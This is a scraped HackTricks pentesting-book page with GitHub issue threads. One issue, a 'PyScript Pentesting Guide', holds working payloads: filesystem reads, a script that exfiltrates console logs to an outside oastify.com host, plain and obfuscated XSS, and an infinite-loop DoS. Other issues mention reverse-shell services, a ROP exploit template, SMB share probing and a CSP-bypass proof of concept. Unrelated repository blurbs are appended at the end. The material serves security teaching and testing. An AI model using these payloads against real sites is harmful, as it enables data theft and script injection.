Hacktricks - Welcome to the page where you will find each trick/technique/whatever I have learnt in CTFs, real life apps, and reading researches and news.

Overview
description
Welcome to the page where you will find each hacking trick/technique/whatever I have learnt in CTFs, real life apps, and reading researches and news.

HackTricks

Welcome to the page where you will find each hacking trick/technique/whatever I have learnt in CTFs, real life apps, and reading researches and news.

Here you can find a little introduction:

Pentesting Methodology

Here you will find the typical flow that you should follow when pentesting one or more machines.

Click in the title to start!

{% hint style="danger" %} Do you use Hacktricks every day? Did you find the book very useful? Would you like to receive extra help with cybersecurity questions? Would you like to find more and higher quality content on Hacktricks?
Support Hacktricks through github sponsors so we can dedicate more time to it and also get access to the Hacktricks private group where you will get the help you need and much more! {% endhint %}

If you want to know about my latest modifications/additions or you have any suggestion for HackTricks or PEASS, join the 💬 telegram group, or follow me on Twitter 🐦 @carlospolopm.
If you want to share some tricks with the community you can also submit pull requests to https://github.com/carlospolop/hacktricks that will be reflected in this book and don't forget to give on github to motivate me to continue developing this book.

Corporate Sponsors

STM Cyber

****STM Cyber is a great cybersecurity company whose slogan is HACK THE UNHACKABLE. They perform their own research and develop their own hacking tools to offer several valuable cybersecurity services like pentestings, Red teams and training.

You can check their blog in https://blog.stmcyber.com****

STM Cyber also support cybersecurity open source projects like HackTricks :)

INE

INE is a great platform to start learning or improve your IT knowledge through their huge range of courses. I personally like and have completed many from the cybersecurity section. INE also provides with the official courses to prepare the certifications from eLearnSecurity.

INE also support cybersecurity open source projects like HackTricks :)

Courses and Certifications reviews

You can find my reviews of the certifications eMAPT and eWPTXv2 (and their respective preparation courses) in the following page:

{% content-ref url="courses-and-certifications-reviews/ine-courses-and-elearnsecurity-certifications-reviews.md" %} ine-courses-and-elearnsecurity-certifications-reviews.md {% endcontent-ref %}

License

Copyright © Carlos Polop 2021. Except where otherwise specified (the external information copied into the book belongs to the original authors), the text on HACK TRICKS by Carlos Polop is licensed under the Attribution-NonCommercial 4.0 International (CC BY-NC 4.0).
If you want to use it with commercial purposes, contact me.

Comments
  • TypeError: can only concatenate str (not

    TypeError: can only concatenate str (not "bytes") to str

    Hello, I have really enjoyed your Hack Trick series, but after trying your ROP-PWN template, I have encountered the following issue noted below. I would love to continue learning with the exercise. Please let me know if any additional details are needed.

    I appreciate your help with this.

    https://raw.githubusercontent.com/carlospolop/hacktricks/master/misc/basic-python/rop-pwn-template.md

    $ python3 --version Python 3.8.5

    [*] Loaded 14 cached gadgets for './vuln' [*] running in new terminal: /usr/bin/gdb -q "/home/palmistry/CTF/vuln" 2973 -x /tmp/pwnrsj3k9sx.gdb [-] Waiting for debugger: debugger exited! (maybe check /proc/sys/kernel/yama/ptrace_scope) [*] Main start: 0x401156 [*] Puts plt: 0x401054 [*] pop rdi; ret gadget: 0x4011f3 [*] puts GOT @ 0x404018 Traceback (most recent call last): File "template.py", line 90, in get_addr("puts") #Search for puts address in memmory to obtains libc base File "template.py", line 72, in get_addr rop1 = OFFSET + p64(POP_RDI) + p64(FUNC_GOT) + p64(PUTS_PLT) + p64(MAIN_PLT) TypeError: can only concatenate str (not "bytes") to str

    opened by wafflesx90 7
  • Method to read the material offline (ebook or PDF)

    Method to read the material offline (ebook or PDF)

    I really enjoy this site and the information you've created. I tried a number of ways to scrape the site to a PDF or ebook for offline consumption, but none of them worked or they looked really bad. :)

    enhancement help wanted 
    opened by gkwhite 6
  • PyScript Pentesting Guide

    PyScript Pentesting Guide

    PyScript Pentesting Guide

    PyScript is a new framework developed for integrating Python in the HTML so, it can be used alongside HTML. In this cheat sheet you'll find how to use the PyScript for your penetration testing purposes.

    Dumping / Retrieving files from the Emscripten virtual memory filesystem:

    Code:

    <py-script>
            with open('/lib/python3.10/site-packages/_pyodide/_base.py', 'r') as fin:
            out = fin.read()
            print(out)
    </py-script>
    

    Result:

    image

    OOB Data Exfiltration of the Emscripten virtual memory filesystem (console monitoring)

    Code:

        <py-script>
    x = "CyberGuy"
    if x == "CyberGuy":
        with open('/lib/python3.10/asyncio/tasks.py') as output:
            contents = output.read()
            print(contents)
    print('<script>console.pylog = console.log.bind(console); console.logs = []; console.log = function(){     console.logs.push(Array.from(arguments));     console.pylog.apply(console, arguments);fetch("http://9hrr8wowgvdxvlel2gtmqbspigo8cx.oastify.com/", {method: "POST",headers: {"Content-Type": "text/plain;charset=utf-8"},body: JSON.stringify({"content": btoa(console.logs)})});}</script>')
       </py-script>
    

    Result:

    image

    Cross Site Scripting (Ordinary)

    Code:

    <py-script>
            print("<img src=x onerror='alert(document.domain)'>")
    </py-script>
    

    Result:

    image

    Cross Site Scripting (Python Obfuscated)

    Code:

    <py-script>
    sur = "\u0027al";fur = "e";rt = "rt"
    p = "\x22x$$\x22\x29\u0027\x3E"
    s = "\x28";pic = "\x3Cim";pa = "g";so = "sr"
    e = "c\u003d";q = "x"
    y = "o";m = "ner";z = "ror\u003d"
    
    print(pic+pa+" "+so+e+q+" "+y+m+z+sur+fur+rt+s+p)
    </py-script>
    

    Result:

    image

    Cross Site Scripting (JavaScript Obfuscation)

    Code:

    <py-script>
       print("<script>var _0x3675bf=_0x5cf5;function _0x5cf5(_0xced4e9,_0x1ae724){var _0x599cad=_0x599c();return _0x5cf5=function(_0x5cf5d2,_0x6f919d){_0x5cf5d2=_0x5cf5d2-0x94;var _0x14caa7=_0x599cad[_0x5cf5d2];return _0x14caa7;},_0x5cf5(_0xced4e9,_0x1ae724);}(function(_0x5ad362,_0x98a567){var _0x459bc5=_0x5cf5,_0x454121=_0x5ad362();while(!![]){try{var _0x168170=-parseInt(_0x459bc5(0x9e))/0x1*(parseInt(_0x459bc5(0x95))/0x2)+parseInt(_0x459bc5(0x97))/0x3*(-parseInt(_0x459bc5(0x9c))/0x4)+-parseInt(_0x459bc5(0x99))/0x5+-parseInt(_0x459bc5(0x9f))/0x6*(parseInt(_0x459bc5(0x9d))/0x7)+-parseInt(_0x459bc5(0x9b))/0x8*(-parseInt(_0x459bc5(0x9a))/0x9)+-parseInt(_0x459bc5(0x94))/0xa+parseInt(_0x459bc5(0x98))/0xb*(parseInt(_0x459bc5(0x96))/0xc);if(_0x168170===_0x98a567)break;else _0x454121['push'](_0x454121['shift']());}catch(_0x5baa73){_0x454121['push'](_0x454121['shift']());}}}(_0x599c,0x28895),prompt(document[_0x3675bf(0xa0)]));function _0x599c(){var _0x34a15f=['15170376Sgmhnu','589203pPKatg','11BaafMZ','445905MAsUXq','432bhVZQo','14792bfmdlY','4FKyEje','92890jvCozd','36031bizdfX','114QrRNWp','domain','3249220MUVofX','18cpppdr'];_0x599c=function(){return _0x34a15f;};return _0x599c();}</script>")
     </py-script>
    

    Result:

    image

    DoS attack (Infinity loop)

    Code:

        <py-script>
          while True:
             print("&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;")
       </py-script>
    

    Result:

    image

    opened by Cyber-Guy1 4
  • Adding 1 more method for auto revshell

    Adding 1 more method for auto revshell

    The github repo https://github.com/lukechilds/reverse-shell make reverse shell very simple and automatic ! Visit https://reverse-shell.sh/ to know more 😉

    opened by clem9669 4
  • Wrong sudo version number

    Wrong sudo version number

    Hi,

    Doing some research on Linux LPE, I noticed that the Linux Privilege Escalation page mentions sudo <= v1.28 being vulnerable. However, as per the article here https://www.exploit-db.com/exploits/47502, the version is instead 1.8.28. They say that its been fixed in 1.8.28 but I've read in another article (can't find the link anymore) that it is still valid in 1.8.28. Most probably a typo.

    Thank you.

    opened by dlionis 3
  • fix typo+consistent description in automatic tools

    fix typo+consistent description in automatic tools

    fixed a syntax error in nmap command of automatic tools section remove nse and add -- instead of - for better compatibility. more consistend description

    opened by DeveloperOl 3
  • 139,445 - Pentesting SMB

    139,445 - Pentesting SMB

    Hey there,

    I just ran into something that would be probably nice to have as information to pentest SMB shares:

    I'm actually getting restricted from displaying available network shares on a windows machine, which first made me believe there aren't any open shares. After researching though (reading the section about SMB of the Network Security Assessment, 3rd Edition book) I found the names of common shares and tested them manually, which actually lead to successfully connecting to an exposed share.

    So my enhancement would be to add a section at "139,445 - Pentesting SMB", that encourages to manually test for common open shares regardless if they are displayed or not.

    Common share names for windows described in the book are

    IPC$ C$ D$ ADMIN$ PRINT$ FAX$ SYSVOL NETLOGON

    I used the following command to manually test the shares

    smbclient -U '%' -N \\\\IP\\SHARE

    Please let me know what you think and thank you for such an awesome resourse.

    opened by 0xalwayslucky 3
  • Link for Docker container escape points to a non-existing page

    Link for Docker container escape points to a non-existing page

    This one needs to be updated i think.

    Docker socket /var/run/docker.sock is writable (https://book.hacktricks.xyz/linux-unix/privilege-escalation#writable-docker-socket)

    With maybe this one https://book.hacktricks.xyz/linux-hardening/privilege-escalation/docker-breakout/abusing-docker-socket-for-privilege-escalation. Maybe it was moved.

    opened by 0xsyr0 2
  • URL-encode base64 encoded hash

    URL-encode base64 encoded hash

    Base64 strings can contain "+", "=" and "/" characters.

    Also use PHP for hash generation (like the showcased symfony code).

    opened by juergenhoetzel 2
  • MQTT duplicate

    MQTT duplicate

    I saw my change made in https://github.com/carlospolop/hacktricks/pull/318 was not reflected to https://book.hacktricks.xyz/network-services-pentesting/1883-pentesting-mqtt-mosquitto.

    That's because I PRed to pentesting/1883-8883-pentesting-mqtt-mosquitto.md which is not displayed on the website. Only the duplicated page network-services-pentesting/1883-pentesting-mqtt-mosquitto.md.

    Gitbook seems to generate a lot of mess and duplicate files 😂

    I suggest:

    • Removing network-services-pentesting/1883-pentesting-mqtt-mosquitto.md
    • Moving pentesting/1883-8883-pentesting-mqtt-mosquitto.md to network-services-pentesting/1883-8883-pentesting-mqtt-mosquitto.md
    opened by noraj 2
  • Bad Link on Book

    Bad Link on Book

    Under section "To-Do" sub section "Other Big References".

    The link for "Enumeration Cheat Sheet for Windows Targets", is sending users to a link unintended for the purposes of the book.

    opened by Wubzi 0
  • Modules suggestion

    Modules suggestion

    Best Practice details how to use Criminalip. https://www.criminalip.io/developer/best-practice

    It is also provided by Filter, tags, API, etc. https://www.criminalip.io/developer/filters-and-tags/filters https://www.criminalip.io/developer/filters-and-tags/tags https://www.criminalip.io/developer/api/post-user-me

    If you use Asset Search in CriminalIP, you can obtain various information by referring to filter URLs such as IP or tag, and if you use Domain Search, you can determine the presence or absence of malicious/phishing sites.

    I answered what page I should put in the previously requested content, but Criminalip supports OSINT such as malicious IP, phishing site, and Domain search.

    It is a wide range of CTI platforms such as shodan and censys, so please check it.

    opened by parkjunmin 0
  • Neccessary Package no Longer Available on Kali

    Neccessary Package no Longer Available on Kali

    https://book.hacktricks.xyz/network-services-pentesting/8009-pentesting-apache-jserv-protocol-ajp

    The package "libapache2-mod-jk" is no longer available in Kali Linux. It's necessary for the "AJP Proxy" section. My workaround was downloading it from a Debian repo here: https://packages.debian.org/buster/libapache2-mod-jk

    sudo apt-get install libapache2-mod-jk
    sudo vim /etc/apache2/apache2.conf # append the following line to the config
        Include ajp.conf
    sudo vim /etc/apache2/ajp.conf     # create the following file, change HOST to the target address 
        ProxyRequests Off
        <Proxy *>
            Order deny,allow
            Deny from all
            Allow from localhost
        </Proxy>
        ProxyPass       / ajp://HOST:8009/
        ProxyPassReverse    / ajp://HOST:8009/
    sudo a2enmod proxy_http
    sudo a2enmod proxy_ajp
    sudo systemctl restart apache2
    

    According to this page the package was removed from Kali Rolling and Dev in August 2022 https://pkg.kali.org/pkg/libapache-mod-jk

    Full disclosure I am kind of a noob, so I'm not sure if this is the optimal workaround, but it did get everything working for me.

    opened by Plus1059 0
  • CSP Bypass:

    CSP Bypass: "Lack of object-src and default-src" not working

    Relating this part of HackTricks.

    The bypass shown here doesn't work on either the latest Chrome or Firefox. Is there any source where this came from?

    PoC:

    <!DOCTYPE html>
    <html lang="en">
    <head>
        <meta charset="UTF-8">
        <title>Title</title>
        <meta http-equiv="Content-Security-Policy" content="script-src 'self' ;">
    </head>
    <body>
    <object data="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="></object>
    ">'><object type="application/x-shockwave-flash" data='https: //ajax.googleapis.com/ajax/libs/yui/2.8.0 r4/build/charts/assets/charts.swf?allowedDomain=\"})))}catch(e) {alert(1337)}//'>
        <param name="AllowScriptAccess" value="always"></object>
    </body>
    </html>
    

    This results in Content Security Policy: The page’s settings blocked the loading of a resource at inline (“script-src”).

    opened by PinkDraconian 1
Owner
Carlos Polop
Developer, Pentester and Cyber Security Researcher.
Carlos Polop
Convert a collection of features to a fixed-dimensional matrix using the hashing trick.

FeatureHasher Convert a collection of features to a fixed-dimensional matrix using the hashing trick. Note, this requires Jina>=2.2.4. Example Here I

Jina AI 5 Mar 15, 2022
A python base script from which you can hack or clone any person's facebook friendlist or followers accounts which have simple password

Hcoder This is a python base script from which you can hack or clone any person's facebook friendlist or followers accounts which have simple password

Muhammad Hamza 3 Dec 6, 2021
A way to analyse how malware and/or goodware samples vary from each other using Shannon Entropy, Hausdorff Distance and Jaro-Winkler Distance

A way to analyse how malware and/or goodware samples vary from each other using Shannon Entropy, Hausdorff Distance and Jaro-Winkler Distance

null 11 Nov 15, 2022
NexScanner is a tool which allows you to scan a website and find the admin login panel and sub-domains

NexScanner NexScanner is a tool which helps you scan a website for sub-domains and also to find login pages in the website like the admin login panel

null 8 Sep 3, 2022
Profil3r is an OSINT tool that allows you to find potential profiles of a person on social networks, as well as their email addresses 🕵️

Profil3r is an OSINT tool that allows you to find potential profiles of a person on social networks, as well as their email addresses. This program also alerts you to the presence of a data leak for the found emails.

null 1.1k Aug 24, 2021
RapiDAST provides a framework for continuous, proactive and fully automated dynamic scanning against web apps/API.

RapiDAST RapiDAST provides a framework for continuous, proactive and fully automated dynamic scanning against web apps/API. Its core engine is OWASP Z

Red Hat Product Security 17 Nov 11, 2022
Everything I needed to understand what was going on with "Spring4Shell" - translated source materials, exploit, links to demo apps, and more.

springcore-0day-en These are all my notes from the alleged confirmed! 0day dropped on 2022-03-29. This vulnerability is commonly referred to as "Sprin

Chris Partridge 105 Nov 26, 2022
Tool to decrypt iOS apps using r2frida

r2flutch Yet another tool to decrypt iOS apps using r2frida. Requirements It requires to install Frida on the Jailbroken iOS device: Jailbroken device

Murphy 146 Jan 3, 2023
Show apps recorded storage files by jailbreak

0x101 Show registered storage files of apps by jailbreak Legal disclaimer: Usage of insTof for attacking targets without prior mutual consent is illeg

0x 4 Oct 24, 2022
A Python r2pipe script to automatically create a Frida hook to intercept TLS traffic for Flutter based apps

boring-flutter A Python r2pipe script to automatically create a Frida hook to intercept TLS traffic for Flutter based apps. Currently only supporting

Hamza 64 Oct 18, 2022
Simple python script for generating custom high-secure passwords for securing your social-apps ❤️

Opensource Project Simple Python Password Generator This repository is just for peoples who want to generate strong-passwords for there social-account

K A R T H I K 15 Dec 1, 2022
this keylogger is only for pc not for android but it will only work on those pc who have python installed it is made for all linux,windows and macos

Keylogger this keylogger is only for pc not for android but it will only work on those pc who have python installed it is made for all linux,windows a

Titan_Exodous 1 Nov 4, 2021
Simple script to have LDAP authentication in Home Assistant Docker, using NGINX's ldap-auth container

Home Assistant LDAP Auth Simple script to have LDAP authentication in Home Assistant Docker, using NGINX's ldap-auth container. Usage Deploy NGINX's l

Erik 1 Sep 21, 2022
Analyse a forensic target (such as a directory) to find and report files found and not found from CIRCL hashlookup public service

Analyse a forensic target (such as a directory) to find and report files found and not found from CIRCL hashlookup public service. This tool can help a digital forensic investigator to know the context, origin of specific files during a digital forensic investigation.

hashlookup 96 Dec 20, 2022
Yuyu Scanner is a Web Reconnaissance & Web Analysis Scanner to find assets and information about targets.

Yuyu Scanner Yuyu Scanner is a Web Reconnaissance & Web Analysis Scanner to find assets and information about targets. installation ! run as root

Justakazh 20 Nov 24, 2022
DepFine Is a tool to find the unregistered dependency based on dependency confusion valunerablility and lead to RCE

DepFine DepFine Is a tool to find the unregistered dependency based on dependency confusion valunerablility and lead to RCE Installation: You Can inst

Hossam mesbah 14 Nov 11, 2022
Find vulnerable Log4j2 versions on disk and also inside Java Archive Files (Log4Shell CVE-2021-44228)

log4j-finder A Python3 script to scan the filesystem to find Log4j2 that is vulnerable to Log4Shell (CVE-2021-44228) It scans recursively both on disk

Fox-IT 431 Dec 22, 2022
Password-Manager - This app can generate ,save , find and delete passwords.

Password-Manager This app can generate ,save , find and delete passwords. In the StartUp() Function , there are three buttons to choose from : Generat

null 1 Jan 1, 2022